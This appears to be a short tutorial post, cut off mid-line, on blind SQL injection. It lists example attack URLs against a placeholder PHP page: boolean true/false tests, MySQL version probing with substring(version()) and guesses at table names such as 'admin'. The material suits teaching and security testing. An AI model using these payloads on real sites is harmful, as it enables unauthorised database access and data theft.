While preparing for an upcoming presentation, I came across Blind SQL Injection. Following steps I found helpful and you might find it useful. There are 2 types of Blind SQL Injections: 1. Normal Blind => Where you get TRUE/FALSE responses based on output of SQL query. This is visible change in page. 2. Totally Blind => No change in output for TRUE/FALSE condition. 1. Normal Blind: Vulnerable URL: hxxp://site/page.php?id=1 TRUE Response: hxxp://site/page.php?id=1 AND 1=1 FALSE Response: hxxp://site/page.php?id=1 AND 1=2 Check Version: hxxp://site/page.php?id=1 AND substring(version(),1,1)=4 hxxp://site/page.php?id=1 AND substring(version(),1,1)=5 Database version is MySQL 5.x.x. Table & Columns: We need to guess table & column names. For this, subselect should be supported. Check subselect: hxxp://site/page.php?id=1 AND (select 1)=1 Guessing Table name: hxxp://site/page.php?id=1 AND (select 1 from admin limit 0,1)=1 hxxp://site/page.php?id=1 AND (select 1 from users...